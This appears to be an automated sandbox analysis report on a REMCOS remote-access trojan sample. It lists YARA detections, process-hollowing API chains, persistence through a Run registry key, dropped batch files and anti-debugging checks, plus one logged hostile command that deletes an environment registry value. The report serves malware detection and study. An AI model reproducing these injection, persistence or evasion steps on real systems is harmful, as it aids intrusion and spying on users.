Source: 7.2.DpiScaling.exe.10590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.DpiScaling.exe.10590000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\Public\Libraries\fvghbqsD.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_00412BE1 ExitWindowsEx,LoadLibraryA,GetProcAddress,

7_2_00412BE1

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_004340D5	7_2_004340D5
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00423098	7_2_00423098
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00411205	7_2_00411205
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0043820B	7_2_0043820B
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_004223C0	7_2_004223C0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0044D3FA	7_2_0044D3FA
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0043843A	7_2_0043843A
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0043450A	7_2_0043450A
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00419521	7_2_00419521
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0044B5AB	7_2_0044B5AB
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00431670	7_2_00431670
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0042E6D5	7_2_0042E6D5
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_004516E0	7_2_004516E0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_004337C1	7_2_004337C1
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_004228B7	7_2_004228B7
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0043493F	7_2_0043493F
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0043FA50	7_2_0043FA50
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0041AAA0	7_2_0041AAA0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00430BBE	7_2_00430BBE
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0044BCC9	7_2_0044BCC9
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00433CBD	7_2_00433CBD
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00422F55	7_2_00422F55
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00437FDC	7_2_00437FDC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105910CA	7_2_105910CA
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105B322E	7_2_105B322E
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105AA38F	7_2_105AA38F
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105C24DE	7_2_105C24DE
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105BF543	7_2_105BF543
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105C462F	7_2_105C462F
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105B3725	7_2_105B3725
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105AB90E	7_2_105AB90E
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105B3DC3	7_2_105B3DC3
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105B3F06	7_2_105B3F06

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 0042F49E appears 37 times
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 00402084 appears 78 times
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 0042FB60 appears 53 times
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Code function: String function: 022FF847 appears 35 times

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0041412B CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,		7_2_0041412B
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105A4F99 CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,		7_2_105A4F99

Source: IQl00lxPjo.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: IQl00lxPjo.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Dsqbhgvf.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Dsqbhgvf.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f

Source: IQl00lxPjo.exe

Virustotal: Detection: 31%

Source: C:\Users\user\Desktop\IQl00lxPjo.exe

File read: C:\Users\user\Desktop\IQl00lxPjo.exe

Jump to behavior

Source: C:\Users\user\Desktop\IQl00lxPjo.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\IQl00lxPjo.exe 'C:\Users\user\Desktop\IQl00lxPjo.exe'
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Libraries\Dsqbhgvf.exe 'C:\Users\Public\Libraries\Dsqbhgvf.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Libraries\Dsqbhgvf.exe 'C:\Users\Public\Libraries\Dsqbhgvf.exe'
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Process created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Process created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Process created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Process created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior

Source: C:\Users\user\Desktop\IQl00lxPjo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_00413958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

7_2_00413958

Source: C:\Users\user\Desktop\IQl00lxPjo.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Dsqbhgvfcbfuajfyoyryjvltgfkcgym[1]

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@23/10@7/1

Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

7_2_004163AD

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_0040D211 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

7_2_0040D211

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_01
Source: C:\Windows\SysWOW64\DpiScaling.exe	Mutant created: \Sessions\1\BaseNamedObjects\Sept-AITAB5
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1280:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_01

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_00416C39 FindResourceA,LoadResource,LockResource,SizeofResource,

7_2_00416C39

Source: C:\Users\user\Desktop\IQl00lxPjo.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '

Source: C:\Users\user\Desktop\IQl00lxPjo.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230DA20 push 00406414h; ret	0_3_0230DA44
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230F324 push ecx; mov dword ptr [esp], eax	0_3_0230F325
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230DBC6 push 004065BCh; ret	0_3_0230DBEC
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230DBC8 push 004065BCh; ret	0_3_0230DBEC
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230D9E6 push 004063DCh; ret	0_3_0230DA0C
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230D9E8 push 004063DCh; ret	0_3_0230DA0C
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230DED8 push 004068CCh; ret	0_3_0230DEFC
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230D708 push 00406121h; ret	0_3_0230D751
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230DA20 push 00406414h; ret	0_3_0230DA44
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230F324 push ecx; mov dword ptr [esp], eax	0_3_0230F325
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230DBC6 push 004065BCh; ret	0_3_0230DBEC
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230DBC8 push 004065BCh; ret	0_3_0230DBEC
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230D9E6 push 004063DCh; ret	0_3_0230DA0C
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230D9E8 push 004063DCh; ret	0_3_0230DA0C
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230DED8 push 004068CCh; ret	0_3_0230DEFC
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_0230D708 push 00406121h; ret	0_3_0230D751
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Code function: 0_3_02894274 push eax; ret	0_3_028942B0

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,

7_2_0040CD09

Source: C:\Users\user\Desktop\IQl00lxPjo.exe

File created: C:\Users\Public\Libraries\Dsqbhgvf.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_00405C8B ShellExecuteW,URLDownloadToFileW,

7_2_00405C8B

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

7_2_004163AD

Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Dsqbhgvf			Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Dsqbhgvf			Jump to behavior

Source: C:\Windows\SysWOW64\DpiScaling.exe

7_2_0040CD09

Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Delayed program exit found

Show sources

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_0040D0B5 Sleep,ExitProcess,

7_2_0040D0B5

Source: C:\Windows\SysWOW64\DpiScaling.exe TID: 3080

Thread sleep time: -51000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

7_2_004160DB

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	7_2_0040A012
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_004061C3 FindFirstFileW,FindNextFileW,	7_2_004061C3
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	7_2_0040A22D
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,	7_2_004153F5
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00417754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	7_2_00417754
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_004077EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	7_2_004077EC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00446AF9 FindFirstFileExA,	7_2_00446AF9
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00407C55 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	7_2_00407C55
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_10597031 FindFirstFileW,FindNextFileW,	7_2_10597031
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_1059B09B FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	7_2_1059B09B
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105A85C2 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	7_2_105A85C2
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_1059AE80 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	7_2_1059AE80

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_0040697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

7_2_0040697D

Source: DpiScaling.exe, 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_0042F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_0042F727

Source: C:\Windows\SysWOW64\DpiScaling.exe

7_2_0040CD09

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_0040F15D GetProcessHeap,OpenProcess,OpenProcess,OpenProcess,GetCurrentProcessId,OpenProcess,GetCurrentProcessId,OpenProcess,

7_2_0040F15D

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0043CB4E mov eax, dword ptr fs:[00000030h]	7_2_0043CB4E
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105910CA mov eax, dword ptr fs:[00000030h]	7_2_105910CA
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105910CA mov eax, dword ptr fs:[00000030h]	7_2_105910CA
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105CD9BC mov eax, dword ptr fs:[00000030h]	7_2_105CD9BC

Source: C:\Users\user\Desktop\IQl00lxPjo.exe

Code function: 0_3_0230F0AC LdrInitializeThunk,

0_3_0230F0AC

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0042F8B9 SetUnhandledExceptionFilter,	7_2_0042F8B9
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0042F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_0042F727
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_00436793 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00436793
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0042FD2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0042FD2C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105C7601 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_105C7601
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_105C0B9A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_105C0B9A

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 8D0000	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 960000	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 970000	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 980000	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 990000	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 8E0000	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 8F0000	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 900000	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 910000	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10590000	Jump to behavior
